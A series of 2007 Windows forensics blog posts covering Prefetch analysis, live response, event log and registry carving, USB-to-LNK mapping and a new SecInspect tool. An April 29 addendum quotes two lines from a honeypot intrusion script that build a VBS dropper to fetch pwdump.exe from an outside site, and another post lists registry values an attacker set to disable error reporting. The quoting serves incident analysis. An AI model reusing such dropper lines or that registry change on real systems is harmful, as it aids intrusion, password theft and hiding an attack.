First off, XP can maintain up to 128 Prefetch files...these are files within the Windows\Prefetch directory that end in ".pf". These files contain a bunch of prefetched code, and the second half of the files generally contain a bunch of Unicode strings that point to various modules that were accessed when the application was launched. Also, each Prefetch file contains that run count (number of times the application has been run) as well as a FILETIME object representing the last time the application was launched, within the file itself (ie, metadata).

Okay, so how can this information be used during forensics analysis? Remember Harlan's Corollary to the First Law of Computer Forensics? If you acquire an image from a system...say, a user's laptop...and you're told that the user had this laptop for a year or so, and you don't find any .pf files...what does that tell you?

Mark talked about U3 Smart Technology, and some of the Prefetch artifacts left behind by the use of tools like this. Excellent observations, but keep in mind that the Prefetch files aren't specific to a user...they're system-wide. On a multi-user system, you may have to look other places to determine which user launched the application in the first place. Ovie does a great job talking about the UserAssist keys and how they can help you narrow down who did what on the system.

I've looked to the Prefetch folder for assistance with an investigation. In one instance, there was a suspicion that a user had deleted some files and removed software from the system, and attempted to cover his tracks. While it was clear that the user had done some of these things (ie, removed software, emptied their Recycle Bin, etc.) it was also clear that they hadn't gone through the trouble of running one of those tools that delete everything; most of the artifacts I would look for were still in place (can you guess from my book what those artifacts might have been?). I found a reference to defrag.exe in the Prefetch folder, but nothing to indicate that the user had run the defrag tool (XP's built-in, automatic anti-forensics capabilities are a subject for another post). It turns out that as part of the Prefetch capability, XP runs a limited defrag every 3 days...the Prefetch capability prefetches XP's own prefetch functionality. ;-)

In another instance, I wanted to see if a user had burned anything to CD from the system. I found the installed software (Roxio Sonic), but found no references in any of the user artifacts to actually launching the software. I did, however, find an IMAPI.EXE-XXXXXX.pf file in the Prefetch directory. Interestingly enough, the Unicode strings within the file included a reference to iTunes, which, it appeared, the user used a lot. It turns out that iTunes likes to know where your CD or DVD burner is...I confirmed this on another system on which I knew the user used iTunes, and had not burned any CDs.

So, as a wrap up, some things to look for when you're digging into the Prefetch directory:

- How many .pf files (between 0 and 128) are in the Prefetch directory?

- For each .pf file, get the last run time and the run count. The last run time is a FILETIME object, meaning that it is maintained in UTC format...you may need to adjust using information from the TimeZoneInformation Registry key (ie, ActiveTimeBias).

- Correlate .pf files and the last run times to UserAssist key entries to tie activity to a specific user, as well as the Event Logs.

- Run strings to get the Unicode strings from the file and see what other modules were accessed when the application was launched.

Finally, there is a ProDiscover ProScript on the DVD that ships with my book (in the ch5 directory) that will locate the Prefetch folder (via the Registry) and automatically parse the .pf files, listing the last run time and run count for each. I have since updated that ProScript to display its output in time-sorted order, showing the most recent time first. I've found that this makes analysis a bit easier.

Saturday, May 19, 2007

New versions of tools released

I ran across a blog post this morning saying that new versions of pwdump6 and fgdump have been released.

So what does this have to do with forensic analysis? Well, like most folks, I've seen compromised systems that start by getting a downloader on the system, and the attacker is able to gain System level access and use something like wget to download their tools. I've seen not only the pwdump password dumping tool on systems, but I've also seen the output file from the command run sitting on the system...in some cases, in a public web directory with a corresponding query for that page in the web logs.

For those of you who use hash comparison tools, grab these puppies, hash 'em and store the hashes! If you don't do hash comparisons, or don't use this technique to a great extent, you should still be aware of the tools.

Litchfield on Oracle Live Response

Thanks to Richard Bejtlich, I learned this morning that David Litchfield, famed security researcher with NGSSoftware, has released a paper entitled Oracle Forensics Part 4: Live Response. In that paper, David starts off by discussing live response in general, which I found to be very interesting, as he addresses some of the questions that we all face when performing live response, particularly those regarding trust and assurance...trusting the operating system, trusting what the tools are telling use, etc.

David's paper highlights some of the aspects of live response that every responder needs to be aware of...in particular, when the first responder arrives on-scene and wants to collect volatile data, she will usually start by assessing the situation, and then when she's ready to collect that volatile data, insert a CD full of tools into the CD-ROM drive. From David's paper:

When they insert the CD and run one of the tools, due to the way Windows launches new processes, the tool will have key system dynamic link libraries in its address space, i.e. the memory the tool uses.

Great point...but keep in mind that at this point in time, during live response, there really isn't any way to avoid this situation. It happens, and it has to happen. The key to live response isn't how to keep it from happening...rather, it's to have a thoroughly documented process that lets you address the situation head on.

One of the main concerns about live response is often, if we do live response and have to take the information to court, how do we prove that our investigation did not modify the "scene" in any way, and that everything is pristine? The fact is...we can't. Nor should we try. Instead, we need to have a thorough, documented process, and be able to show that while our actions did modify the "scene" (via the application of Locard's Exchange Principle or Heisenberg's Uncertainty Principle...) just as an EMT's actions will modify a real-world crime scene, as investigators we should be looking at the totality of the information or evidence that we're able to collect and examine.

So, in a nutshell, while it is possible that the tools we loaded and ran on the system to collect volatile data were themselves compromised by a patched version of ntdll.dll in memory, what does the totality of the information tell us?

One thing I would suggest is that when you're reading David's excellent paper, and you get to the General Steps of Live Response section, refer back to the Order of Volatility. Dave is correct in that the application-specific information (about Oracle in this case) should be collected last but IMHO, the first thing that should be collected, as soon as possible, is a complete snapshot of physical memory (check out the sample chapter for my book, Windows Forensic Analysis). The reason I would suggest collecting the contents of physical memory first have to do with David's description of process creation...when a process is created, an EPROCESS block and all of the other structures necessary (at least one ETHREAD block) are created, consuming memory. This means that as processes are created, the pages used by other processes will be swapped out to the pagefile. Knowing this, we should collect as much of the contents of RAM as possible before moving on and collecting specific items, such as running processes, or the memory contents (RAM + pagefile) of those processes, etc.

Okay, enough about live response for now...this is a topic that deserves it's own space.

I found David's paper to be particularly interesting, as some of the work I've been involved with (and likely will continue to be involved with) has had to do with databases; was the database compromised, and if so, was sensitive information extracted from the database. I'm not a database guy (ie, a DBA) but I do need to know some things about databases; per David's suggestion, it's often best for an incident responder to work shoulder-to-shoulder with an experienced DBA, bringing the forensics mindset (and requirements) to the table.

If you're interested in database security in general, check out David's databasesecurity.com site for more information and books related to database security. For additional information about other database topics, I picked up a link at Andrew Hay's blog, pointing to the Comprehensive SQL Injection Cheat Sheet (well, the cheat sheet is actually here). This resource is invaluable to anyone performing forensic analysis of a potentially compromised system, particularly if it either has a web server installed, or acted as a database back-end for a web-based system. Hint: any reference in web server logs to SQL stored procedures is worth looking at!

Sunday, May 13, 2007

Forensic Visualization

A while ago, I ran across an interesting 3D visualization project called fe3d. I remember thinking at the time that this would have been cool to have when I was performing vulnerability assessments. Something like this would have made analysis a bit easier...going through ASCII logs can be a pain...but it would have also been a plus in our deliverables, allowing us to provide the data in a visually appealling way to the customer. I'd also used the old version of cheops before, as well.

I was reading Andrew Hay's blog this morning and came across an interesting post from O'Reilly SysAdmin that has to do with log file visualization. This looks very interesting. I haven't dug into the code content itself yet, but I have to ask...has anyone used this for log file analysis during incident response?

Some thoughts that I had:

1. Using Marcus Ranum's artificial ignorance, read in the IIS web server logs from a case, and compare the entries to the actual pages on the web server (yes, I understand that this would take a couple of phases). If a request is made for a page that exists on the web server, set the color of the dot to green. If the request is made for a page that doesn't exist on the web server (as with a scan), set the color to red.

2. Modify the code to use Event Logs, and tag certain events or records from each log with a particular color based on the event. Say, records from the Security Event Log get a particular color, or successful logins get one color and failed login attempts get another color.

I can see how something like this would be very helpful in visualization of data content, as well as presentation and reporting of the data that is found. I'm thinking more along the lines of reports to customers, but I'm sure that there are others out there who are thinking, "would something like this be useful in presenting data to a prosecutor, or to a jury??"

Saturday, May 12, 2007

Forensic Laws

I mentioned a concept or idea in my book, but I wanted to follow up on it a bit...I believe to be a theorem. Okay, maybe not a theorem (there's no math involved), so how about a law. Let's call it the First Law of Computer Forensics. Yeah, yeah...that's the ticket! Kind of like "Murphy's Law".

With that being said...here goes:

There is evidence of every action.

Just to be above board on this, credit (or blame, you decide) goes to Jesse Kornblum. One thing to keep in mind about this law is that the evidence is there...it simply may not exist on the media that you're currently examining. For example, one question that I've seen in the lists is, how do you tell from an acquired image of a system if files were copied from it to, say, a thumb drive? Well, you may find the existence of the file on the system, and you will find that the thumb drive was plugged into the system (to see how to determine this on Windows systems, grab a copy of my book), but how do you determine if the file was copied to the thumb drive, if all you have is the image of the system? The fact is...you can't. You need the thumb drive. Even though the evidence you're looking for isn't on the image, it is on the thumb drive.

Now, here's Harlan's Corollary to the First Law of Computer Forensics:

Once you understand what actions or conditions create or modify an artifact, then the absence of that artifact is itself an artifact.

What this is saying is that not only is there evidence of every action, but the lack of that evidence is itself evidence.

Thoughts?

Addendum, 13 May: I wanted to point out that the example I gave of the laptop and the thumb drive is just that...an example. If you're starting to think that I'm making an absolute, definitive statement about the existence of an artifact on the thumb drive, please re-read the statement, and think of it only as an example. Thanks.

Friday, May 11, 2007

PPT Metadata

I received an email recently asking if I had any tools to extract metadata from PowerPoint presentations. Chapter 5 of my book includes the oledmp.pl Perl script, which grabs OLE information from Office files; this includes Word documents, Excel spreadsheets, and PowerPoint presentations. I've run some tests using this script, and pulled out things like revision number, created and last saved dates, author name, etc.

Pretty interesting stuff. There may be more...maybe based on interest and time, someone can look into this...

Here's an example of the oledmp.pl output from a PPT file (some of the info is masked to protect privacy):

C:\perl>oledmp.pl file.ppt
ListStreams
Stream : ♣DocumentSummaryInformation
Stream : Current User
Stream : ♣SummaryInformation
Stream : Pictures
Stream : PowerPoint Document

Trash Bin Size
BigBlocks 0
SystemSpace 876
SmallBlocks 0
FileEndSpace 1558

Summary Information
subject
lastauth Mary
lastprinted
appname Microsoft PowerPoint
created 09.06.2002, 19:51:48
lastsaved 14.09.2004, 19:08:39
revnum 32
Title Title
authress John Doe

Pictures
Current User
♣SummaryInformation
PowerPoint Document
♣DocumentSummaryInformation

So what does all this mean? Well, we see the various streams that are embedded in the document, and an example of what is extracted from the SummaryInformation stream. Some of this information can be seen by right-clicking on the file in Windows Explorer, choosing Properties, and then choosing the Summary Tab, and then clicking the Advanced button.

Simple modifications to the oledmp.pl script will let you extract the stream tables, as well, showing even more available information.

Tuesday, May 08, 2007

Event Logs in Unallocated Space

I received an email from a friend recently, asking about finding an Event Log in unallocated (ne "free") space. He mentioned that he'd found it using a hex editor and copied it out of the image to a separate file, but still couldn't open it in the Event Viewer.

That got me thinking about the content of my book, and how that could be useful in a situation like this. On page 201 of Windows Forensic Analysis, table 5.3 lists the event record structure; that is, what an event record "looks like". With this information alone, event records can be retrieved from unallocated space; once you find the "magic number", back up 4 bytes and you've got the size of the event record. From there, you can copy out the entire event record and the rest of the information within the record can be easily parsed from unallocated space, or even from the pagefile or a RAM dump.

A post from another forum got me thinking that the same is true for Registry keys, as well. Figure 4.3 illustrates a hex view of what a Registry key and a Registry value "look like" on disk. Using this information, as well as the code listed on pgs. 133 and 134, Registry keys and values can be extracted and reconstructed from unallocated space, the pagefile, or even a RAM dump.

The great thing is that event records and Registry keys have time stamps associated with them (Registry values do not). This also illustrates what can be retrieved from these other areas through data carving...after all, event records and Registry structures have "magic numbers", similar to file headers, and their data can be carved out just as easily.

Sunday, May 06, 2007

SOLD OUT!

I went by the Syngress site for my book today and saw a message that said, in part:

Sorry! This item is currently out of stock at syngress.com. You may want to check availability at the resellers listed on the item's catalog page.

Cool! Many thanks to everyone who has purchased a copy of the book, and to those who are going to...

Addendum, 8 May: I called a bunch of people at Syngress yesterday, leaving messages all over. I was somewhat concerned that the original page had been completely replaced, so no one could put the book on back-order, or view the Table of Contents or even the Sample Chapter. This morning, the order page is back up, sans the picture of the book cover.

Addendum, 9 May: Okay, false alarm, folks! I finally got through to someone at the publisher, and it turns out that while the books are running low due to the volume of orders, what really happened is that the web page fell victim to a developer!

Interviews

For anyone who is curious about my book, Windows Forensic Analysis (ToC and sample chapter available), I've had an opportunity to speak to some folks and answer some questions recently:

Andrew Hay's Q&A
29 Apr CyberSpeak Podcast with Ovie and Brett
ForensicFocus

I'm really looking forward to Andrew's review of my book.

Tuesday, May 01, 2007

Something Else To Look For...

Not long ago, Didier Stevens blogged about Windows Safe Mode and some Registry keys/values that pertain to Safe Mode. He filed this blog entry under "hacking". One of the cool things about computer forensics is that it's the flip side of hacking...discovering artifacts or "footprints" to find what kind of things happened on a system when it was "hacked".

Didier points out in his blog post how easy it is to write your own service that launches from Safe Mode. As more and more malware authors seem to be choosing a Windows service over the ubiquitous Run key in order to maintain the persistence of their malware on a system, it simply makes sense that a check should be made of the SafeBoot (Windows 2000, XP) key, as well.

Is this really such an issue, something you should be concerned about when performing IR or conducting an investigation? Let me add some perspective...not long ago, I examined a worm that had infected several systems, and it created an entry for itself in the RunOnce key; the entry was prepended with a "*". Does anyone get the significance of that?

Saturday, April 28, 2007

Something New To Look For

Over on the Windows Forensic Analysis group, Hogfly mentioned something he'd found in a honeypot that had been compromised by the MS DNS exploit...a script that modified several values within the following Registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting

The values modified include:

AllOrNone
DoReport
IncludeKernelFaults
IncludeMicrosoftApps
IncludeWindowsApps
IncludeShutdownErrs
ShowUI

So, what's this all about? Remember how some malware tries to shut off AV software or the Windows Firewall? Well, the script that Hogfly found uses reg.exe to set all of the values (except the first one) to 0, and effectively shuts down any error reporting, which is essentially a visual notification that something is wrong on the system.

When performing IR or CF Registry analysis, this is another place to look regarding issues on a system following an intrusion or compromise. If nothing else, this sort of information can provide you with some insight as to the technical sophisitication of the attacker or malware author.

Addendum, 29 Apr: From Hogfly's updated post on the analysis of the honeypot: here's an extract from a .vbs script that was created on the system:

echo Set xPost = CreateObject("Microsoft.XMLHTTP")>>get.vbs
echo xPost.Open "GET","http://www.dit.net/images/pwdump.exe",0 >>get.vbs

These lines make the resulting script work like a dropper, reaching out to another site and grabbing a file. Under the hood, the script uses the WinInet API (the "GET" functionality, specifically), which will leave other artifacts on the system; specifically, you will see web browser history (ie, Temporary Internet Files) for the "Default User". Robert Hensing has an excellent write-up on this phenomenon; in a nutshell, whenever the WinInet API functions are executed from a System-level account, the TIF history appears within the "Default User" profile.

Links
Error Reporting Policies and Advanced Features
BitCruncher Script for Annoyances

Tuesday, April 17, 2007

WFA Sample Chapter

I wanted to point out to the readers of this blog that Syngress/Elsevier has a sample chapter of my book available online for free download. The sample chapter is chapter 3, Windows Memory Analysis.

I point this out because I've received questions via a number of forums about the content...questions like, "how will this book help me?" and "will this book teach me anything new?"

...and I thought Troy Larson's quote would've been enough to sell the book to the blind!

If you download the chapter, or purchase the book, I'd greatly appreciate comments...regarding content, etc.

Thanks!

Sunday, April 15, 2007

Drive Encryption

One of the challenges posed by Vista to traditional forensic analysis is the use of BitLocker to encrypt data on the hard drive. However, this really isn't any different from other similar technologies such as PGP, etc., that already allow encryption of files, partitions, or drives.

The response to encountering active drive encryption, particularly when dealing with an uncooperative suspect, should be to acquire a live image of the system hard drive, as in many cases, powering off the system and removing the hard drive may result in encrypted data being imaged, and until we get some kind of instantaneous image translation technology, that would be a "Bad Thing" for analysts.

So, when approaching a system, how does one tell whether or not there's any drive encryption in use? Well, Hogfly wrote an excellent WMI VBS script for detecting BitLocker. Using Perl, you could implement this script and then "compile" it into a standalone EXE and run it from a CD prior to imaging.

At this point, all we'd need to do is come up with other "signatures" for drive encryption that we can look for. Using a checklist of visible references to look for on the screen, and combining that with a small applet that would be run from a CD and tell the responder (ie, LEO, etc.) if drive encryption was active and in-use, would likely be the best approach.

Thoughts?

Monday, April 09, 2007

From the Lab: Mapping USB devices via LNK files

My first "From the Lab" post will be to address something I see regularly in forums; how does one tie a specific USB-connected device to a Windows system using shortcut (LNK) files, given nothing more than an acquired image to work with? We know that we can extract information about USB devices that have been connected to a system using nothing more than the raw System Registry file...we can get the devices, any drive letters they were mapped to, as well as the date that they were last connected to the system. However, often times we'll have some shortcut files in an image that will point to specific files...images, documents, etc...that we may be interested in, and the drive letter will be F:\ or G:\, or something else that is not part of the system (either as physical or logical drive) that we acquired the image from. So the question is, how do we map the shortcut file to the specific device?

Well, the first thought would be to go to the MountedDevices key and see which devices were mounted as specific drive letters. We know that the binary data for a specific DosDevice entry will contain a reference that looks like "\??\STORAGE\RemovableMedia", followed by the ParentIdPrefix of the device. So, if we have a shortcut file that contains the path "F:\malware.exe", and we know that the device called "\DosDevices\F:" points to a removable storage device, we can then use the ParentIdPrefix value to map back to the USB device found beneath the Enum\USBStor key.

Remember: the ParentIdPrefix value is NOT the device serial number!!

But what happens if you find the multiple USB devices have been connected to the system, and several of them have been mapped to the F:\ drive letter? How do you determine which device was connected when the shortcut was created? Well, to find out, I decided to run a little experiment...

Here's how the experiment works...I plug a GeekSquad 1GB thumb drive into my laptop, and when the drive is created (F:\), I open it and create a shortcut to an application or file on the thumb drive. The shortcut goes on my desktop. This is meant to simulate shortcuts created by files on the thumb drive being accessed/opened, and the shortcut (.lnk) files being created in the Recent folder.

The first thing I did was run secinspect.exe (with the "-n" switch to avoid the hex dumps). As the thumb drive is not a disk, per se, I do not get a disk signature.

Next, I ran ldi.exe, a tool I wrote that is available on the DVD that accompanies my book (located in the ch1\code\Tools directory). This tool implements WMI (Perl source code is available on the DVD, as well) and uses the Win32_LogicalDisk to get the volume serial number from the device (Note: the Win32_PhysicalMedia class returns the manufacturer's serial number for hard drives). Running ldi.exe with the "-c" switch to obtain the .csv format output, I get:

F:\,Removable,,1B360101,FAT,,961.875 MB

Basically, this says that the F:\ drive is identified by Windows (XP SP2, in this case) as being a removable disk, with volume serial number 1B36-0101. The device is formatted FAT, and is approximately 1GB.

Ah, the volume serial number. Very cool! What is the volume serial number, or VSN? The VSN is a value that is calculated, based in part on the current date and time, when the partition is formatted, and added to the boot sector. For all intents and purposes, it should be a unique value, specific to the device, although it can be modified. This Usenet post provides some insight at to how the VSN is created on Win95.

I verified the volume serial number using "chkdsk f:", and got:

Volume Serial Number is 1B36-0101

It is important to note that this experiment is being run against a USB-connected thumb drive, which happens to be formatted FAT. The volume serial number appears to be located in the 4 bytes starting at offset 0x027 within the (first) primary partition. According to the MS TechNet article How NTFS Works, the volume serial number for a partition formatted NTFS is an 8-byte value located at offset 0x48.

The commands "fsutil fsinfo volumeinfo F:" and "vol F:" return the same information as the chkdsk command.

Using a tool based on Jesse Hager's Windows shortcut file format documentation (ie, lslnk.exe found in the ch5\code directory on the book DVD), we see that the shortcut file also includes that volume serial number:

Shortcut file is on a local volume.
Volume Name =
Volume Type = Removable
Volume SN = 0x1b360101

Okay, so far, so good. In most cases, however, you may not have the actual thumb drive available, for whatever reason. So how're you going to map the shortcut file to the specific device that appears in the USBStor key within the Registry? We already know how to map the USBStor key entry to the drive letter that it was mapped to...but that only works if we assume that another device wasn't attached to the system and mapped to the same drive letter at some later point in time. But if you do not have the thumb drive, is the volume serial number useful? It doesn't appear to be so, as the volume serial number does not seem to be stored in any location (key or value) within the Registry that I can locate at this time. This may be by design, as a thumb drive can be reformatted and given a different volume serial number, but be the same device and have the same unique instance ID (serial number from the device descriptor). I even checked the disk_install and volume_install entries within the setupapi.log file, and found no specific reference to the volume serial number at all.

So, as of yet, there does not appear to be any way to map from the info in a shortcut file (ie, drive letter and volume serial number) to the specific thumb drive, without having that thumb drive available. An alternative would be to map time-based information from artifacts (MAC times on the shortcut file, on Prefetch files, associated with other Registry entries) to the time-based information regarding when the device was last connected to the system.

If anyone has any other information that they'd like to share about this issue, it would be greatly appreciated.

Resources:
Windows 2000: Disk Concepts and Troubleshooting
MS TechNet: How FAT Works
Understanding Disk Volume Tracking in Windows 95

Great news for IR and live response!

There was some great news recently for IR and live response!

Over the past couple of years, when discussing the viability and usefulness of live response, particularly as a source of evidence to be used in court, I have very often heard folks say, "I won't perform live response until there is case law to support its use."

Is it just me, or does sound like a chicken-or-the-egg thing? How can something be accepted in court if you're not willing to do the work and bring it into court in the first place? After all, look at everything that is used in court as evidence now, but at one time wasn't...fingerprints, DNA, even computer forensic evidence.

I was reading the TaoSecurity blog post regarding the Heckencamp case, and came across something interesting...that the court accepted a sysadmin's actions of logging into Heckencamp's computer to definitively determine that it was, in fact, the system being used to attack a mail server.

The Wired story mentions things like "counter-crack" and "counter-hacking", and I shudder at the use of both terms. The court's ruling includes a lot of discussion about expectation of privacy, but also includes such things as the fact that the sysadmin wasn't acting as an agent of law enforcement, but instead was acting to preserve the integrity of the mail server that was under attack. Basically, from what I can see in the opinion, the sysadmin confirmed that the system was used to attack the mail server by examining "network logs" and "after approximately 15 minutes of looking only in the temporary directory, without deleting, modifying, or destroying any files, Savoy [the sysadmin] logged off of the computer."

Okay, if anyone believes that nothing was modified in 15 minutes...well, that's a discussion for another time. After all, in order to access "network logs", a file would have had to have been accessed, modifying the last access time of the file...logging into the system itself would have modified logs, the contents of memory, etc...but I digress.

The Wired article ends in a monologue about vigilantism and student privacy, but that's not what I'm seeing here or interested in at all. Sure, the sysadmin used a username and password from a previous portion of his "investigation" to access Heckencamp's system, and the ethics of this can be argued until the cows come home. However, what I'm seeing is that live response may be starting to gain acceptance in court. If a sysadmin can log into a system and muck about for 15 minutes, why can't someone with a detailed process access a live system, collect necessary evidence as part of a thoroughly documented methodology, and then use that evidence in court?

Sunday, April 08, 2007

Interesting Tool - SecInspect

Now that my book has been released, I'll be posting updates, errata, and comments here in this blog. Some of the updates will include things such as tool updates, as well as "From the Lab" entries (sort of mini-HowTos), comments, reader questions, etc.

One interesting tool I ran across recently on HogFly's ForensicIR blog is something new from Microsoft called "Sector Inspector". Secinspect.exe is a command line tool (ie, great for IR and live response!!) that lets the sysadmin view things such as a list of physical devices, drive geometries, disk signature and volume serial number, etc. Now much of this is available through WMI classes such as Win32_PhysicalMedia, but secinspect.exe may be much easier for many folks to use, particularly if you want to include it as part of your drive documentation process (ie, hook up a drive to your write-blocker and then collect data on it using secinspect.exe prior to or immediately after acquiring an image).

An excerpt of what secinspect.exe collected when run on my own system:

Target - \\.\PHYSICALDRIVE1
14593 Cylinders
255 Heads
63 Sectors Per Track
512 BytesPerSector
12 MediaType
[snip]
Disk Signature 0x96244465

Also, for each partition, you see information such as:

SerialNumber : 10675897970943624920

Note: You can also use this with USB thumb drives.

Cool stuff!

Monday, April 02, 2007

Using Perl in Forensics

Ever wondered how some folks use Perl in their jobs, particularly when performing computer forensic analysis? I'm always interested to see who folks use Perl particularly because I use it so much.

I ran across a Perl script for extracting Time Zone Information from an image recently from Citadel Systems. Interestingly enough, it uses my own Offline Registry Parser (regp.pl), which is available on the DVD with my book as well as on my SourceForge.net site.

Pretty cool, eh? I think that its nice to get this kind of feedback...that someone found something you wrote to be useful enough to use it or replicate it.